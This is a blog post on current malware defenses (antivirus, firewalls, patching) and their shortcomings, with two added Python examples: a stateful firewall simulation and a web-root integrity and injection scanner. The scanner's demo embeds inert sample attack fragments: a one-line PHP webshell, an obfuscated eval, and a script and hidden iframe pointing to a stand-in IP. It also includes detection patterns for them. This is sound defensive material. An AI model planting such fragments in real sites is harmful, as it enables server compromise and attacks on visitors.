The Batman Approach Part II: Current Malware Defenses & Their Downfalls

by Jordan Spencer Cunningham on

We in the digital world have not been left utterly desolate in our crusade against the common virus maker. Countless tools exist to help the ordinary user defend against the innumerable threats that viruses present, mainly in the form of antimalware suites (I only ever recommend Malwarebytes, as nothing else I’ve seen works half as well) and firewalls. These two types of tools are the main defenses of operating systems against viruses and hackers. Another important layer of defense falls to operating system developers such as Microsoft, Apple, and the Linux communities: writing rock-solid code and patching holes and bugs before they are discovered and subverted for malevolent purposes. The question, however, is whether these defenses are working, and whether they are enough.


See The Batman Approach Part I: Historical & Modern Malware/Antimalware

See The Batman Approach Part III: The Only Way Forward Against Malware

Contemporary Defenses

Antimalware programs, commonly known as antivirus, are plentiful, which is itself a sure sign that malware is abundant and thriving. There are dozens of major antivirus vendors; some offer free versions of varying quality, and most offer premium versions, also of varying quality. Each can remove thousands of different kinds of viruses, and together they have certainly helped keep the spread of viruses down to a certain level.

Firewalls are a pillar of computer security. Simply put, a firewall is software (or, in larger and more technical environments, a combination of software and hardware) that lets traffic into or out of a network or computer only when it meets certain criteria. Most consumer firewalls, such as those built into home routers and operating systems like Windows, are preconfigured to allow all outbound traffic initiated by local resources (a user loading web pages or downloading email) and to block all inbound traffic initiated from outside (an outside user trying to reach a web or SSH server on the local machine). They do this statefully: the replies belonging to a connection the inside opened are let back in, while a packet arriving from outside with no matching connection is dropped. Even the best firewall cannot protect a user from his or her own bad decisions, but even on a small home network it silently drops dozens to hundreds of unsolicited connection attempts and scans a day. Without one, an unpatched computer exposed directly to the internet is a sitting duck that can be hacked and infected within minutes of connecting.
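To make the default policy concrete, here is an added example (not code from the original post, and not any vendor's firewall) that simulates the stateful behaviour described above: everything the inside initiates is allowed, the replies that belong to those connections are let back in, and anything else arriving from outside is dropped. It keeps a small connection-tracking table keyed on the flow, the way the conntrack/NAT table on a home router does. The LAN range, the addresses, and the packet sequence are all constructed for illustration.

```python
"""Stateful "consumer firewall" default policy, simulated.

Added example, not from the original post. The LAN range and all packets
below are constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass

LAN = ipaddress.ip_network("192.168.1.0/24")   # assumption: the inside network


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str          # "tcp" or "udp"
    flags: str = ""     # TCP flags as letters, e.g. "S", "SA", "A"


def inside(ip: str) -> bool:
    return ipaddress.ip_address(ip) in LAN


class StatefulFirewall:
    """Allow outbound; allow inbound only if it matches a flow the inside opened
    (or a port that was deliberately published)."""

    def __init__(self, inbound_allow=()):
        # (proto, port) pairs deliberately exposed, e.g. a port-forwarded web server
        self.inbound_allow = set(inbound_allow)
        self.conntrack = set()          # flows the inside has opened

    @staticmethod
    def flow(p: Packet):
        # Direction-independent key so a reply matches the request that caused it.
        return (p.proto,) + tuple(sorted([(p.src, p.sport), (p.dst, p.dport)]))

    def decide(self, p: Packet) -> str:
        k = self.flow(p)
        if inside(p.src) and not inside(p.dst):
            # Outbound is always allowed. TCP state starts at the SYN; UDP has
            # no handshake, so any outbound datagram opens a pinhole for replies.
            if p.proto == "udp" or p.flags == "S":
                self.conntrack.add(k)
            return "ACCEPT"
        if not inside(p.src) and inside(p.dst):
            if k in self.conntrack:
                return "ACCEPT"          # reply to something the inside initiated
            if (p.proto, p.dport) in self.inbound_allow:
                self.conntrack.add(k)
                return "ACCEPT"          # explicitly published service
            return "DROP"                # unsolicited inbound: the default
        return "ACCEPT"                  # LAN-to-LAN traffic is not policed here


# Constructed traffic: RFC 5737 documentation addresses stand in for the internet.
CONSTRUCTED_TRAFFIC = [
    Packet("192.168.1.10", 51000, "198.51.100.20", 443, "tcp", "S"),   # laptop opens HTTPS
    Packet("198.51.100.20", 443, "192.168.1.10", 51000, "tcp", "SA"),  # server's SYN-ACK comes back
    Packet("203.0.113.5", 40000, "192.168.1.10", 22, "tcp", "S"),      # outside scanner probes SSH
    Packet("203.0.113.5", 443, "192.168.1.10", 51001, "tcp", "A"),     # bare ACK with no matching state
    Packet("192.168.1.10", 53001, "198.51.100.53", 53, "udp"),         # DNS query out
    Packet("198.51.100.53", 53, "192.168.1.10", 53001, "udp"),         # DNS answer back
    Packet("198.51.100.53", 53, "192.168.1.10", 53002, "udp"),         # "answer" to a port never used
]


def run_demo(inbound_allow=()) -> list:
    """Run the constructed traffic through a fresh firewall; returns one verdict per packet."""
    fw = StatefulFirewall(inbound_allow)
    return [fw.decide(p) for p in CONSTRUCTED_TRAFFIC]


if __name__ == "__main__":
    for pkt, verdict in zip(CONSTRUCTED_TRAFFIC, run_demo()):
        print(f"{verdict:6} {pkt.proto} {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} {pkt.flags}")
```

The scanner's SYN to port 22 and the stray ACK are dropped purely because nothing on the inside asked for them; passing `inbound_allow=[("tcp", 22)]` to `run_demo` is the equivalent of opening a port forward, and the SSH probe is then accepted, which is exactly why publishing a service is the moment a firewall stops protecting it.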

Malware writers and hackers never rest; they constantly search for new vulnerabilities and exploit them. It is no surprise, then, that the makers of common operating systems are also constantly at work finding and fixing these vulnerabilities. Microsoft releases Windows patches at least once a month, Apple releases patches for Mac OS several times a year, and the many Linux distributions have various ways of releasing and distributing updates, with some shipping minor updates as often as every night. Apple and Microsoft keep the details of their patches under lock and key until release so that information about the vulnerabilities stays out of the hands of those who would use it for malevolent purposes. Once a patch ships, however, attackers can compare the patched code against the old version to work out what was fixed, so a machine that does not install the patch promptly becomes more exposed after the release, not less.

Linux operating systems are generally patched quickly after vulnerabilities are discovered. Because Linux is open source[1], many have claimed that it must be far more vulnerable to exploits, since anyone can analyze the system's internals and then take advantage of them. However, Linux, BSD, Mac OS (which is based partially upon BSD), and other UNIX-like systems have stood the test of time with very few viruses that have spread significantly outside of laboratories, and they have also had far fewer major exploits than Windows. The exception to the rule is Android, which runs on a Linux kernel and has an uncharacteristic amount of malware available for it, though most of it spreads because users install malicious apps themselves rather than by propagating on its own like a worm.

Linux and other Unix-like operating systems today run nearly two-thirds of the world's web servers, while Windows runs the remaining third. System administrators of the literally tens of millions of web servers[2] usually try to keep their systems up to date, establish rigorous security procedures, eliminate exploitable code, scan for and fix vulnerabilities, and monitor for attacks.

Downfalls of Contemporary Defenses

Despite these various security measures, many of which are free, nearly a quarter of Windows machines worldwide are not protected by even basic antimalware, and malware still gets past well-regarded antivirus products often enough as it is. Antivirus software, especially on Windows computers, also cannot protect against the stupidity of the user: a significant portion of malware and potentially unwanted programs[3] are installed directly, or indirectly caused to be installed, by the poor choices and lack of understanding of computer users. Users who download pirated software and media, search for pornography, or click links and open attachments in email from unknown or suspect sources have computers that are among the most infected worldwide, often without the user even knowing it. Even the most angelic web surfers shoot themselves in the foot by never updating their operating systems or the software that resides on them. Antivirus and firewalls cannot prevent much of this ill-advised activity.

Additionally, as of this writing and for the three months prior, a large share of computers worldwide, somewhere between ten and seventeen percent depending on who is counting, are still running Windows XP. Windows XP was originally released in 2001 and was superseded by three operating systems beginning in 2007, with a fourth due in 2015. Microsoft officially ended support for Windows XP in April 2014, meaning that no further vulnerabilities will be patched. XP's age and lack of support have made it a prime target for hackers and malware writers. With so many machines still running it, some in vital roles such as ATMs and medical equipment, millions of machines are more vulnerable than ever: the XP machines directly, because every newly found hole stays open for good, and the machines that share a network with them indirectly, because a compromised XP box can spread malware to its neighbors.

Servers are another matter. Keeping them secure is critical, since the majority of malware distributed online comes from legitimate servers that have been compromised. These compromises are usually due to the operating system or applications not being kept up to date, poor security settings, a lack of defenses, or vulnerable web application code. Of the millions of web servers on the internet today, many don't get the administrative attention they need, and even when the server does, the web code running on it often doesn't. A server doesn't have to be completely taken over to become a dangerous malware vector; most often the attacker injects a small piece of malicious code (typically an obfuscated script, a hidden iframe, or a dropped backdoor file) into part of a website, and from then on the server pushes malware downloads, redirects visitors to fraudulent bank sites to steal credentials, or does something else the owner never intended, often without the owner knowing. A compromised server is potentially more dangerous than an army of infected workstations: it has far more processing capacity and bandwidth, it talks to thousands or millions of other machines every day, and it often holds the very sensitive information it was supposed to keep safe.
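Because the injection is small and the rest of the site keeps working, the owner rarely notices by looking. Two checks an administrator can run catch it anyway, shown here as an added example that is not code from the original post: a hash baseline of the web root taken while the site is known-good, which reports any file added or changed since, and a heuristic scan of those files for the usual injected fragments (zero-size iframes, `eval` of obfuscated strings, PHP that executes request input, scripts loaded from hosts that are not on the site's own allowlist). The web root, its files, the trusted-host list, and the injected fragments are all constructed for illustration; a real deployment would hash `/var/www` or equivalent, store the baseline off the server, and run the comparison from cron.

```python
"""Web-root integrity baseline plus injected-code heuristics.

Added example, not from the original post. The site contents, the trusted
script host, and the "attacker" changes are constructed for illustration.
"""
import hashlib
import json
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption for the example;
# a real site lists its own CDN and analytics hosts here).
TRUSTED_SCRIPT_HOSTS = {"cdn.example-trusted.net"}

# Heuristics for the small fragments attackers typically drop into a page or an
# upload directory once they can write to the web root.
SIGNATURES = [
    ("zero-size iframe",
     re.compile(r"<iframe[^>]*\b(width|height)\s*=\s*[\"']?0\b", re.I)),
    ("eval of decoded/obfuscated string",
     re.compile(r"\beval\s*\(\s*(unescape|atob|String\.fromCharCode|"
                r"base64_decode|gzinflate|str_rot13)\b", re.I)),
    ("PHP code execution on request input",
     re.compile(r"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*"
                r"\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
]
SCRIPT_SRC = re.compile(r"<script[^>]+\bsrc\s*=\s*[\"']([^\"']+)", re.I)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict:
    """Relative POSIX path -> SHA-256 for every regular file under root (dotfiles included)."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_baseline(baseline: dict, current: dict) -> dict:
    """What changed since the known-good snapshot."""
    return {
        "added":   sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_text(text: str) -> list:
    """Heuristic hits for one file's contents; an empty list means nothing matched."""
    hits = [name for name, rx in SIGNATURES if rx.search(text)]
    for src in SCRIPT_SRC.findall(text):
        if src.startswith("//"):
            src = "https:" + src            # protocol-relative URL
        host = urlparse(src).hostname       # None for same-origin paths like /js/app.js
        if host and host not in TRUSTED_SCRIPT_HOSTS:
            hits.append(f"script loaded from untrusted host {host}")
    return hits


def scan_file(path: Path) -> list:
    return scan_text(path.read_text(errors="replace"))


# Constructed site content and constructed injected fragments (inert strings,
# modelled on the shapes seen in real compromises).
CLEAN_INDEX = """<html><head>
<script src="https://cdn.example-trusted.net/jquery.min.js"></script>
<script src="/js/app.js"></script>
</head><body><h1>Welcome</h1></body></html>
"""
INJECTED_TAIL = ('<script>eval(unescape("%61%6c%65%72%74%28%31%29"))</script>\n'
                 '<script src="http://198.51.100.77/j.js"></script>\n'
                 '<iframe src="http://198.51.100.77/count.php" width="0" height="0"></iframe>\n')
DROPPED_SHELL = "<?php @eval($_POST['c']); ?>\n"


def run_demo() -> dict:
    """Baseline a clean site, simulate the compromise, and report what the checks find."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "app.js").write_text("console.log('app');\n")
        (root / "index.html").write_text(CLEAN_INDEX)
        baseline = hash_tree(root)          # snapshot taken while the site is known-good
        # The compromise: a small injection into an existing page plus a backdoor
        # dropped into an upload directory, everything else left untouched.
        (root / "index.html").write_text(CLEAN_INDEX + INJECTED_TAIL)
        (root / "uploads").mkdir()
        (root / "uploads" / ".cache.php").write_text(DROPPED_SHELL)
        changes = diff_baseline(baseline, hash_tree(root))
        suspicious = {p: scan_file(root / p) for p in changes["added"] + changes["changed"]}
        return {"changes": changes, "suspicious": {p: h for p, h in suspicious.items() if h}}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The baseline diff is the check that actually matters: it flags the modified page and the dotfile in `uploads/` regardless of what they contain, whereas the pattern scan only recognizes injection styles it already knows about and will miss anything novel. The heuristics are there to prioritize what the diff turns up, not to replace it.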

This is just a taste of the worldwide malware epidemic. Despite the widespread adoption of antivirus tools and other security measures, malware evidently still gets into protected environments. Often that is the user's doing, but viruses can also find their way through networks without any help from careless users or poorly configured servers.

  1. Open source operating systems, the most popular family of which is Linux, have their source code available for the world to see; their licenses almost always allow anyone to take the code and alter it to fit his or her needs, unlike the closed source code of Windows and Mac OS. Because of that openness and those permissive licenses, open source operating systems are usually free, sometimes with optional paid support, again unlike Windows and Mac OS.
  2. While it's extremely hard to state accurately how many web servers exist on the internet, the illegal but comprehensive and unprecedented 2012 Internet Census reported about 70 million IP addresses with port 80 open. Many of these are certainly poorly configured home routers, security cameras, and other common devices with web interfaces, but the majority are most likely actual web servers hosting one or more websites. For comparison, there were an estimated 634 million websites around the time of that census in 2012; we're likely closer to 900 million by now.
  3. Potentially unwanted programs, classified as PUPs by most antimalware firms, are programs that often behave like viruses but may have been installed by the user on purpose and have no overtly malicious purpose. They are often installed quietly alongside a legitimate program the user downloaded from an improper source. The most common PUPs are software such as SearchProtect, Conduit, and a wide array of other sneaky programs that hijack the browser homepage and inject ads into websites.